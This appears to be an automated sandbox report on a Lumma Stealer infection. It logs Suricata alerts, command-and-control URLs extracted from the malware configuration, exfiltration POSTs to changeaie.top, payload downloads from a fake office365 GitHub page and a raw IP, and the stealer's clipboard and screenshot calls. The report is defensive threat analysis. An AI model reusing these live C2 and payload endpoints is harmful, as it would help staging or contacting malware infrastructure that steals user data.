Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-3FFFFD7Fh]	14_2_0042284A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	14_2_0042F836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+10h]	14_2_0043A8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	14_2_00432916
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-000000BAh]	14_2_0042D9CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-26h]	14_2_004329CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	14_2_0041F992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	14_2_0041F992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+345EAD76h]	14_2_00430A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	14_2_00409AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	14_2_00409AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28E05E3Ch]	14_2_0044EAD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+097116DCh]	14_2_00424A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-04391816h]	14_2_0044EBFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+ecx*8], 77A7A163h	14_2_00448B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	14_2_00448B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp ebp, eax	14_2_00448B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 430C3968h	14_2_00452BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp+08h], ecx	14_2_00431BB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0CCFFB74h]	14_2_00411C41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esp+esi+17338B88h]	14_2_00451C66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	14_2_00429C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	14_2_0040ACC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0D9D1166h]	14_2_0044BCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], cl	14_2_00437D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], cl	14_2_00437D1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	14_2_00443D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-16h]	14_2_0044BDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 5675B2C2h	14_2_0044BDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-1FAD3AD0h]	14_2_0041CE4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 5675B2C2h	14_2_00453E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	14_2_00437EE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ebx], cl	14_2_00437EE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [esi], cx	14_2_00427EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	14_2_0043AE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	14_2_00401F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [edx], cx	14_2_0041BF57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+00000084h]	14_2_00438FB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2061393 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soursopsf .run) : 192.168.2.4:49805 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061395 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (changeaie .top) : 192.168.2.4:54682 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49719 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2061407 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (xcelmodo .run) : 192.168.2.4:55875 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49724 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49726 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49730 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49729 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49727 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49728 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.108.153:443 -> 192.168.2.4:49711

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: xcelmodo.run/nahd
Source: Malware configuration extractor	URLs: soursopsf.run/gsoiao
Source: Malware configuration extractor	URLs: changeaie.top/geps
Source: Malware configuration extractor	URLs: easyupgw.live/eosz
Source: Malware configuration extractor	URLs: liftally.top/xasj
Source: Malware configuration extractor	URLs: upmodini.digital/gokk
Source: Malware configuration extractor	URLs: salaccgfa.top/gsooz
Source: Malware configuration extractor	URLs: zestmodp.top/zeda

Source: global traffic	HTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /public_files/fafhAeI.txt HTTP/1.1Host: 62.60.226.112Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 62.60.226.112 62.60.226.112
Source: Joe Sandbox View	IP Address: 185.199.108.153 185.199.108.153
Source: Joe Sandbox View	IP Address: 185.199.108.153 185.199.108.153

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49719 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.42.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 104.21.42.7:443

Source: global traffic	HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 61Host: changeaie.top
Source: global traffic	HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CQSACrjAUntbCSCvfUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 19626Host: changeaie.top
Source: global traffic	HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CC7ECSEpW0ndU1vjrUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 8783Host: changeaie.top
Source: global traffic	HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OE1hz97v4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20396Host: changeaie.top
Source: global traffic	HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Sjrfr23jhf1hMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2311Host: changeaie.top
Source: global traffic	HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=jG6C8YrYhbdn006fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 557364Host: changeaie.top
Source: global traffic	HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 99Host: changeaie.top

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.226.112

Source: global traffic	HTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /public_files/fafhAeI.txt HTTP/1.1Host: 62.60.226.112Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: ofice365.github.io
Source: global traffic	DNS traffic detected: DNS query: xcelmodo.run
Source: global traffic	DNS traffic detected: DNS query: soursopsf.run
Source: global traffic	DNS traffic detected: DNS query: changeaie.top
Source: global traffic	DNS traffic detected: DNS query: c.pki.goog

Source: unknown

HTTP traffic detected: POST /geps HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 61Host: changeaie.top

Source: svchost.exe, 00000007.00000002.2394642232.000001FDC9C0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1203426927.000001FDC9B58000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1203426927.000001FDC9B58000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1203426927.000001FDC9B58000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000003.1203426927.000001FDC9B8D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1580076840.0000026425B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1290266831.0000015EB0FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1580076840.0000026425B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000004.00000002.1580076840.0000026425B28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1290266831.0000015EB0FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?13711309
Source: MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top/
Source: MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top/8
Source: MSBuild.exe, 0000000E.00000002.1403926278.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top/geps
Source: MSBuild.exe, 0000000E.00000002.1403926278.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top/gepsA
Source: MSBuild.exe, 0000000E.00000002.1400725047.00000000015C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top/gepse
Source: MSBuild.exe, 0000000E.00000002.1400725047.00000000015C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top/gepsw=
Source: MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top/kn
Source: MSBuild.exe, 0000000E.00000002.1400725047.00000000015D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top:443/geps
Source: MSBuild.exe, 0000000E.00000002.1400725047.00000000015D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top:443/geps2o
Source: MSBuild.exe, 0000000E.00000002.1400725047.00000000015D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://changeaie.top:443/gepst
Source: svchost.exe, 00000007.00000003.1203426927.000001FDC9C02000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1203426927.000001FDC9C02000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ofice365.github.io
Source: powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ofice365.github.io/1/test.jpg09
Source: svchost.exe, 00000007.00000003.1203426927.000001FDC9C02000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.7.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 14_2_00441D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

14_2_00441D70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 14_2_00441D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

14_2_00441D70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 14_2_00442334 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

14_2_00442334

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

